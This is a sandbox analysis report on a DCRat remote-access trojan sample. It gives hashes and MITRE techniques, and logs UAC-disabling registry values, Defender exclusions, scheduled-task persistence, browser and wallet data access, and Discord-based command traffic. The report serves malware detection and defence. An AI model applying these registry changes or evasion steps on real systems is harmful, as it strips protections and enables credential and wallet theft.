dcrat | 1f90346558652d404562975e6398d69e7f35ececc367f030f9d0bd817f2535ed

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
23-05-2024 03:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

338A02FF68C87C2E7D097B380656D773.exe
Size

65.0MB
MD5

338a02ff68c87c2e7d097b380656d773
SHA1

ce40934e8be5b9538b39e29a071df219ea259d21
SHA256

1f90346558652d404562975e6398d69e7f35ececc367f030f9d0bd817f2535ed
SHA512

32bddf7228af9bfc96e5b5d8e231b56718d409294a923b7cbb11dc94364611b01064ec9a40a680de26dcd66b3ba54d1f234c0a7466b235147d7609b786731521
SSDEEP

393216:9Om3Gy/7I4ro5jnVT5Xjbu8Y1l1zbg8i:om57IYis8m1b

Score

10^/10

dcrat evasion execution infostealer rat spyware stealer trojan upx

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 39 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5556	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5936	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5844	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6040	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3328	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4728	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3664	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3964	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4464	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2936	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5484	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5400	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5992	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5896	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5780	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	836	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5844	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4188	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1128	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5804	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4860	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5952	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5780	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5432	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	748	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1748	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5988	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4840	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4392	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5888	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4956	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3188	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6040	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1032	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4308	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3664	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5484	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4464	1508	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2488	1508	schtasks.exe

UAC bypass 3 TTPs 45 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

smss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exeMonitorcommon.exeMonitorcommon.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\antiriser.bat	dcrat
C:\chainwebwinref\Monitorcommon.exe	dcrat
behavioral2/memory/5532-344-0x0000000000550000-0x000000000088E000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3092 powershell.exe
4956 powershell.exe
Disables Task Manager via registry modification
evasion

pid	process
3092	powershell.exe
4956	powershell.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_ctypes.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\libffi-8.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_ssl.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_sqlite3.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_socket.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_queue.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_lzma.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_hashlib.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_decimal.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_bz2.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\unicodedata.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\sqlite3.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\select.pyd	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\libssl-1_1.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\libcrypto-1_1.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\_MEI9802\python311.dll	acprotect

Checks computer location settings 2 TTPs 18 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

smss.exesmss.exeMonitorcommon.exesmss.exesmss.exesmss.exesmss.exeMonitorcommon.exesmss.exesmss.exesmss.exesmss.exeantiriser.batWScript.exesmss.exesmss.exe338A02FF68C87C2E7D097B380656D773.exediscord pro+.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Monitorcommon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	Monitorcommon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	antiriser.bat
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	338A02FF68C87C2E7D097B380656D773.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	discord pro+.exe

Executes dropped EXE 20 IoCs

Processes:

Built.exediscord pro+.exeBuilt.exeantiriser.batMonitorcommon.exerar.exeMonitorcommon.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exe

pid	process
980	Built.exe
2920	discord pro+.exe
4576	Built.exe
2940	antiriser.bat
5532	Monitorcommon.exe
6052	rar.exe
540	Monitorcommon.exe
5572	smss.exe
3600	smss.exe
5116	smss.exe
3280	smss.exe
2640	smss.exe
3924	smss.exe
5184	smss.exe
5096	smss.exe
5940	smss.exe
3992	smss.exe
2184	smss.exe
2920	smss.exe
632	smss.exe

Loads dropped DLL 17 IoCs

Processes:

Built.exe

pid	process
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe
4576	Built.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 47 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4576-56-0x0000000074900000-0x0000000074E0B000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\libffi-8.dll	upx
behavioral2/memory/4576-80-0x00000000748B0000-0x00000000748CF000-memory.dmp	upx
behavioral2/memory/4576-79-0x00000000748A0000-0x00000000748AD000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\libssl-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\libcrypto-1_1.dll	upx
behavioral2/memory/4576-86-0x0000000074870000-0x0000000074897000-memory.dmp	upx
behavioral2/memory/4576-91-0x0000000074830000-0x000000007484B000-memory.dmp	upx
behavioral2/memory/4576-96-0x0000000074680000-0x000000007468C000-memory.dmp	upx
behavioral2/memory/4576-99-0x0000000074650000-0x0000000074678000-memory.dmp	upx
behavioral2/memory/4576-98-0x0000000074900000-0x0000000074E0B000-memory.dmp	upx
behavioral2/memory/4576-94-0x00000000746D0000-0x00000000746E6000-memory.dmp	upx
behavioral2/memory/4576-112-0x00000000741B0000-0x00000000742C9000-memory.dmp	upx
behavioral2/memory/4576-111-0x00000000742E0000-0x00000000742F0000-memory.dmp	upx
behavioral2/memory/4576-110-0x00000000742D0000-0x00000000742DC000-memory.dmp	upx
behavioral2/memory/4576-109-0x0000000074350000-0x00000000745AA000-memory.dmp	upx
behavioral2/memory/4576-106-0x00000000745B0000-0x0000000074644000-memory.dmp	upx
behavioral2/memory/4576-92-0x00000000746F0000-0x0000000074827000-memory.dmp	upx
behavioral2/memory/4576-88-0x0000000074850000-0x0000000074868000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI9802\python311.dll	upx
behavioral2/memory/4576-282-0x00000000748B0000-0x00000000748CF000-memory.dmp	upx
behavioral2/memory/4576-409-0x00000000745B0000-0x0000000074644000-memory.dmp	upx
behavioral2/memory/4576-406-0x00000000746D0000-0x00000000746E6000-memory.dmp	upx
behavioral2/memory/4576-405-0x00000000746F0000-0x0000000074827000-memory.dmp	upx
behavioral2/memory/4576-404-0x0000000074830000-0x000000007484B000-memory.dmp	upx
behavioral2/memory/4576-400-0x00000000748B0000-0x00000000748CF000-memory.dmp	upx
behavioral2/memory/4576-410-0x0000000074350000-0x00000000745AA000-memory.dmp	upx
behavioral2/memory/4576-399-0x0000000074900000-0x0000000074E0B000-memory.dmp	upx
behavioral2/memory/4576-408-0x0000000074650000-0x0000000074678000-memory.dmp	upx
behavioral2/memory/4576-482-0x0000000074900000-0x0000000074E0B000-memory.dmp	upx
behavioral2/memory/4576-512-0x00000000748B0000-0x00000000748CF000-memory.dmp	upx
behavioral2/memory/4576-514-0x00000000748A0000-0x00000000748AD000-memory.dmp	upx
behavioral2/memory/4576-513-0x00000000742E0000-0x00000000742F0000-memory.dmp	upx
behavioral2/memory/4576-510-0x00000000742D0000-0x00000000742DC000-memory.dmp	upx
behavioral2/memory/4576-497-0x0000000074900000-0x0000000074E0B000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Checks whether UAC is enabled 1 TTPs 30 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

smss.exesmss.exesmss.exesmss.exesmss.exeMonitorcommon.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exeMonitorcommon.exesmss.exesmss.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Monitorcommon.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

32 discord.com
33 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

30 ip-api.com

flow	ioc
32	discord.com
33	discord.com

flow	ioc
30	ip-api.com

Drops file in Program Files directory 2 IoCs

Processes:

Monitorcommon.exe

description	ioc	process
File created	C:\Program Files (x86)\Windows Media Player\Media Renderer\dwm.exe	Monitorcommon.exe
File created	C:\Program Files (x86)\Windows Media Player\Media Renderer\6cb0b6c459d5d3	Monitorcommon.exe

Drops file in Windows directory 4 IoCs

Processes:

Monitorcommon.exeMonitorcommon.exe

description	ioc	process
File created	C:\Windows\Downloaded Program Files\ba0d4000f4d2f4	Monitorcommon.exe
File created	C:\Windows\PLA\Rules\es-ES\backgroundTaskHost.exe	Monitorcommon.exe
File created	C:\Windows\PLA\Rules\es-ES\eddb19405b7ce1	Monitorcommon.exe
File created	C:\Windows\Downloaded Program Files\Built.exe	Monitorcommon.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 39 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

pid	process
4464	schtasks.exe
5896	schtasks.exe
1748	schtasks.exe
6040	schtasks.exe
5804	schtasks.exe
4860	schtasks.exe
5780	schtasks.exe
4840	schtasks.exe
2488	schtasks.exe
5936	schtasks.exe
3964	schtasks.exe
1128	schtasks.exe
4188	schtasks.exe
5484	schtasks.exe
5992	schtasks.exe
836	schtasks.exe
5952	schtasks.exe
5888	schtasks.exe
3664	schtasks.exe
5484	schtasks.exe
5556	schtasks.exe
3328	schtasks.exe
2936	schtasks.exe
3188	schtasks.exe
5844	schtasks.exe
4464	schtasks.exe
5432	schtasks.exe
5988	schtasks.exe
5400	schtasks.exe
5780	schtasks.exe
4956	schtasks.exe
1032	schtasks.exe
6040	schtasks.exe
4728	schtasks.exe
3664	schtasks.exe
4308	schtasks.exe
5844	schtasks.exe
748	schtasks.exe
4392	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

1208 WMIC.exe
